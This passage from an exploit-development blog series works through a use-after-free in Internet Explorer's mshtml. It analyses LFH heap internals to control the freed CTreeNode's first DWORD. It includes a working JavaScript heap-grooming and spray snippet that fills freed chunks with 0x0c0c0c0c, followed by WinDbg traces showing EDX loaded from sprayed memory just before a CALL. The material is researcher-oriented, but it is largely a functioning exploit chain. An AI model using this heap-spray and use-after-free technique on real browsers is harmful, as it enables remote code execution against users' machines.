What we have here, as we saw in the previous post, is that EBX points to the freed CTreeNode object, which is being wrongly reused. So why don't we reclaim the freed CTreeNode and fill it with content we control? If ECX is the first value of the CTreeNode, we could adjust its value so that we jump directly to our nop sled address. The problem is that between the free of the CTreeNode and its use we have no chance of intervening in the execution path (by means of JavaScript). So we need to deal with the address left by the heap allocator. If ECX is the first value of the CTreeNode then, according to the reversed code, it should be pointing to a CObjectElement, but the value in ECX apparently isn't a valid or known object address:

!heap -x 0041010a

Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags

-----------------------------------------------------
00410050  00410058  00370000  00410450       100      -    0  LFH;free  

The reason for this is that EBX was freed. When a user memory chunk is returned to the heap allocator (the LFH in this case), besides all the heap-related metadata being updated, the first WORD in the user portion of the allocation gets a new purpose: it becomes the FreeEntryOffset:

*(WORD *)(ChunkHeader + 8) = AggrExchg.FreeEntryOffset;

This explains the 0x010a, but what is the 0x0041? It is the two most significant bytes of the original value, because the free process doesn't update this WORD. So we know that the CObjectElement pointer had a value of 0x0041xxxx, which corresponds to our freed CObjectElement in the trace: 0x004150e8.
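The decomposition of the stale DWORD is easy to check. This is just the bit arithmetic described above, applied to the values from the crash; the function name is made up for the example.

```python
def split_freed_dword(value: int):
    """Split the first DWORD of a freed LFH chunk into its two halves.

    Returns (stale_high_word, free_entry_offset): the high WORD is what is
    left of the original pointer, the low WORD was overwritten on free.
    """
    free_entry_offset = value & 0xFFFF
    stale_high_word = (value >> 16) & 0xFFFF
    return stale_high_word, free_entry_offset


high, offset = split_freed_dword(0x0041010A)  # value read through EBX
same_high = (0x004150E8 >> 16) == high        # matches the CObjectElement
```

Only the low WORD changed, so the pointer still lands in the same 64 KB region as the original CObjectElement.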

LFH, as it tries to keep fragmentation to a minimum, uses a metadata structure called a heap sub-segment, which organizes memory in contiguous chunks and keeps track of allocated and freed memory blocks of the same size.

So one sub-segment is used to manage blocks of size 0x4C and another sub-segment manages the allocation and de-allocation of blocks of size 0xE0, which explains why two allocations made at nearly the same time, CObjectElement:addr[004150e8] and CTreeNode:node[0042adb0], have such different addresses.

This simplistic view of the process is important, because it allows us to influence the process and, more importantly, the values that we want stored in the first DWORD of the user buffer. I say first DWORD because we want to predictably set it to a usable or controllable pointer address.

How can we influence this, then?

As the first WORD is a FreeEntryOffset, and it's updated when a CTreeNode is freed, we need to impose some determinism on CTreeNode allocations. How do we do this? We allocate enough objects of this size to fill potential holes in the sub-segment that manages 0x4C sized objects, and at some point we start getting contiguous object allocations. The following code will do the trick:

...
document.body.innerHTML += "<strong id='popo' style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'></strong>";
var size = 0x4c;
var arrSize = 200;
var obj_overwrite = unescape("%u0c0c%u0c0c");
while(obj_overwrite.length < size)
{ obj_overwrite += obj_overwrite; }
obj_overwrite = obj_overwrite.substr(0, (size-6)/2);
CollectGarbage();
var arr = new Array();
for(var counter = 0; counter < arrSize; counter++)
{ arr.push(obj_overwrite.substr(0, obj_overwrite.length)); }
for(var counter = arrSize-50; counter < arrSize; counter+=3)
{ delete arr[counter]; }
CollectGarbage();
document.getElementById('popo').innerHTML = "Z";
...

After crashing we get this:

dc ebx ebx+0x4C

002d6318  002e00a7 00000000 ffff404a ffffffff  ........J@......

002d6328  00000051 00000000 00000000 00000000  Q...............

002d6338  00000000 002d6340 00000062 00000000  ....@c-.b.......

002d6348  00000000 00000000 002d6328 00000000  ........(c-.....

002d6358  00000000 00000000 00000000 00000000  ................   

dc ebx-8-0x4C ebx+0x4C+8+0x4C

002d62c4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d62d4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d62e4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d62f4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d6304  0c0c0c0c 00000c0c 00000000 3b93022c  ............,..;

002d6314  80000000 002e00a7 00000000 ffff404a  ............J@..

002d6324  ffffffff 00000051 00000000 00000000  ....Q...........

002d6334  00000000 00000000 002d6340 00000062  ........@c-.b...

002d6344  00000000 00000000 00000000 002d6328  ............(c-.

002d6354  00000000 00000000 00000000 00000000  ................

002d6364  00000000 3b930223 88000000 00000046  ....#..;....F...

002d6374  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d6384  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d6394  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d63a4  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c  ................

002d63b4  0c0c0c0c 00000c0c                    ........

As you can see, the contents of the chunks before and after ours are under our control, since we filled those 0x4C sized objects with 0x0c0c0c0c. This gives us predictability about where our chunk is allocated (relative offset) and about the offset value that is written. But a problem remains that will render useless our effort to control the first WORD of the pointer.

(6c0.4cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7fd6d1eb ebx=0036a530 ecx=003800a7 edx=00000000 esi=0228bd10 edi=00000000
eip=6987b68f esp=0228bce4 ebp=0228bcfc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:7fd6d25b=????????

dc ebx l1
0036a530 003800a7

!heap -x ebx
Entry User Heap Segment Size PrevSize Unused Flags
-------------------------------------------------------
0036a528 0036a530 002b0000 00347878 58 - 0 LFH;free

dt nt!_HEAP_SUBSEGMENT 00347878
ntdll!_HEAP_SUBSEGMENT
+0x000 LocalInfo : 0x002b6f70 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x00369f40 _HEAP_USERDATA_HEADER
+0x008 AggregateExchg : _INTERLOCK_SEQ
+0x010 BlockSize : 0xb
...

dt nt!_HEAP_BUCKET_COUNTERS 0x002b6f70+50
ntdll!_HEAP_BUCKET_COUNTERS
+0x000 TotalBlocks : 0x12b
+0x004 SubSegmentCounts : 7
+0x000 Aggregate64 : 0n30064771371

TotalBlocks only reports 0x12b blocks, which means that no offset beyond this value will be recorded in the first WORD of the pointer. Why? Because it is the sum of all the chunks distributed across all 7 sub-segments (as indicated by SubSegmentCounts). Although we could push this value even higher, that would require more heap allocations. So let's say that the only thing we can predict is that its value will always be a multiple of 0xb (0x58/8) plus 2. We could also force the chunk to the end of the list of a heap sub-segment cache, setting the WORD value to 0xffff, but that would gain us nothing either; more on this later.
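The "multiple of 0xb plus 2" rule can be tested against the offsets seen in the crash dumps. In this sketch the constant 2 is taken straight from the text (presumably the space before the first block, counted in 8-byte units, which is an assumption), and the function name is hypothetical.

```python
BLOCK_UNITS = 0x58 // 8  # 0xb: one 0x58-byte chunk, counted in 8-byte units
FIRST_BLOCK_UNITS = 2    # constant from the text; its origin is an assumption


def is_plausible_free_entry_offset(offset: int) -> bool:
    """Check whether `offset` has the form k * 0xb + 2 for some k >= 0."""
    return (
        offset >= FIRST_BLOCK_UNITS
        and (offset - FIRST_BLOCK_UNITS) % BLOCK_UNITS == 0
    )


# Low WORDs observed in the crashes: 0x010a (0041010a) and 0x00a7 (003800a7).
observed = [0x010A, 0x00A7]
all_fit = all(is_plausible_free_entry_offset(o) for o in observed)
```

Both observed offsets fit the pattern (0x010a is 24 blocks in, 0x00a7 is 15 blocks in), which supports the rule but still leaves the exact value unpredictable.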

dt -a nt!_HEAP_SUBSEGMENT 0x002b6f70+8
ntdll!_HEAP_SUBSEGMENT
[0] @ 002b6f78
---------------------------------------------
+0x000 LocalInfo : 0x03c3e1c0 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x03c3e1a0 _HEAP_USERDATA_HEADER
...
[1] @ 002b6f98
---------------------------------------------
+0x000 LocalInfo : 0x00347878 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x002bdaf0 _HEAP_USERDATA_HEADER
...

Given this, from here on my exploit code diverges from the original one, because I want to make the exploit more resilient. Keep reading.

We now know that the value we're targeting lies within the heap segment that manages chunks of size 0xE8 (where CObjectElement resides), and that we can't control the last 4 hex digits (the low WORD) of the address. Or can we?

All that seems left for predictability at this point is to fill a heap sub-segment with strings of size 0xE8 and place the CObjectElement right in the middle or at the end of this string-sprayed memory area, so that we can profit from its first WORD. The last CObjectElement created must land in a filled sub-segment and not in a new one, where there won't be any string content. So, with 0xffff being the maximum block amount of a sub-segment, we can have, per sub-segment, a total of 2259 chunks of size 0xe8.

?ffff*8/e8
Evaluate expression: 2259 = 000008d3
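
The same arithmetic as the debugger expression above, written out as a small sketch. The function name and its default parameters are hypothetical; the 8-byte granularity and the 0xffff limit come from the expression itself.

```python
def max_chunks_per_subsegment(chunk_size, max_blocks=0xFFFF, granularity=8):
    """Number of whole chunks of chunk_size bytes that fit in max_blocks 8-byte blocks."""
    return (max_blocks * granularity) // chunk_size


chunks = max_chunks_per_subsegment(0xE8)
print(chunks, hex(chunks))
```

Integer division is used on purpose: a partially fitting chunk does not count, which is why the result is 2259 rather than a rounded-up value.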

Say we allocate 2259 string objects of size 0xE8. The first WORD of the freed CTreeNode object will then hold a value between 0x2 and 0xffff, so our pointer might land anywhere within the full address range of the segment:

0xXXXX[0x2-0xffff]

But if we force the usage of a caching sub-segment, the address range is heavily reduced, although we can't predict what we'll get as the first WORD. Forcing cache usage is as simple as allocating a large number of string chunks of size 0xE8 and then freeing a small number of the most recently allocated ones; the freed chunks will fill up the cache and be reused by the time the CObjectElement is created.

But what happens if, by any chance, we hit a point in time where the caches are empty? The object will be allocated from the active sub-segment, and we're back at the starting point, as can be seen in the following example trace:

CObjectElement:addr[028a4f80]
CTreeNode:node[00450080] Type:028a4f80 CObjectElement::`vftable'
eax=00450080 ebx=00457f70 ecx=00450080 edx=00000000 esi=0046f428 edi=028a4f80
eip=6dbd47b9 esp=021fc5d8 ebp=021fc5f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTreeNode::CTreeNode:
6dbd47b9 8bff mov edi,edi

dc 00450080
00450080 00000000 00000000 00000000 00000000 ................

ba w4 00450080

dc 00450080
00450080 028a4f80 00000000 ffff0000 ffffffff .O..............

!heap -x 028a4f80
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------
028a4f78 028a4f80 003d0000 00450d68 e8 - 8 LFH;busy

dt nt!_heap_subsegment 00450d68

ntdll!_HEAP_SUBSEGMENT
+0x000 LocalInfo : 0x003d76c0 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x028a2048 _HEAP_USERDATA_HEADER
+0x008 AggregateExchg : _INTERLOCK_SEQ
+0x010 BlockSize : 0x1d
+0x012 Flags : 0
+0x014 BlockCount : 0x46
+0x016 SizeIndex : 0x1c ''
+0x017 AffinityIndex : 0 ''
+0x010 Alignment : [2] 0x1d
+0x018 SFreeListEntry : _SINGLE_LIST_ENTRY
+0x01c Lock : 7

dt nt!_INTERLOCK_SEQ 00450d68+8
ntdll!_INTERLOCK_SEQ
+0x000 Depth : 0x11
+0x002 FreeEntryOffset : 0x603
+0x000 OffsetAndDepth : 0x6030011
+0x004 Sequence : 0xff425ade
+0x000 Exchg : 0n-53380335944925167
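
The _INTERLOCK_SEQ fields above are overlapping views of the same 8 bytes, so the signed Exchg value can be unpacked back into Depth, FreeEntryOffset and Sequence. This is a minimal sketch assuming the little-endian layout implied by the field offsets in the dump; the function name is hypothetical, and the "next free chunk" computation additionally assumes that FreeEntryOffset is counted in 8-byte units from UserBlocks.

```python
import struct


def decode_interlock_seq(exchg):
    """Unpack a signed 64-bit Exchg value into (Depth, FreeEntryOffset, Sequence)."""
    raw = struct.pack("<q", exchg)          # 8 bytes, little-endian, signed
    return struct.unpack("<HHI", raw)       # WORD, WORD, DWORD


# Exchg as printed by the debugger (0n-53380335944925167).
depth, free_entry_offset, sequence = decode_interlock_seq(-53380335944925167)
print(hex(depth), hex(free_entry_offset), hex(sequence))

# Assumption: next free chunk = UserBlocks + FreeEntryOffset * 8.
user_blocks = 0x028A2048
next_free = user_blocks + free_entry_offset * 8
print(hex(next_free))
```

Under that assumption the next free chunk lies at 0x028a5060, which is exactly 0xe8 bytes past the entry 0x028a4f78 just handed out to the CObjectElement.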

dt nt!_HEAP_LOCAL_SEGMENT_INFO 0x003d76c0
ntdll!_HEAP_LOCAL_SEGMENT_INFO
+0x000 Hint : (null)
+0x004 ActiveSubsegment : 0x00450d68 _HEAP_SUBSEGMENT
+0x008 CachedItems : [16] (null)
+0x048 SListHeader : _SLIST_HEADER
+0x050 Counters : _HEAP_BUCKET_COUNTERS
+0x058 LocalData : 0x003d6b48 _HEAP_LOCAL_DATA
+0x05c LastOpSequence : 0x87
+0x060 BucketIndex : 0x1c
+0x062 LastUsed : 0

The allocation of the CObjectElement is being retrieved from the active sub-segment.

Can we get the best of both worlds? I think we can. Freeing strings will increase our chances of heap cache usage, and since freeing a string does not alter its content, we'll allocate a full segment and then free a portion of it by de-allocating a couple of even- or odd-indexed strings from the array. This will leave the heap in the following state:

When IE allocates the CObjectElement it will end up in one of these holes, surrounded by 0x0e0e0e0e strings.

The code:

As you can see above, the full address space covered by the base address 0x1d4XXXX is filled with our string content. Although this is no guarantee of a working exploit, it greatly increases the probability of successful exploitation. So EAX is now 0x0e0e0e0e, and EDX will hold [0x0e0e0e0e+70h].

As the next instruction in the execution stream is CALL EDX, you know where we're going from here… Stage 2.

I hope you enjoyed it.

Everything is possible when a man wants it (and the woman allows it).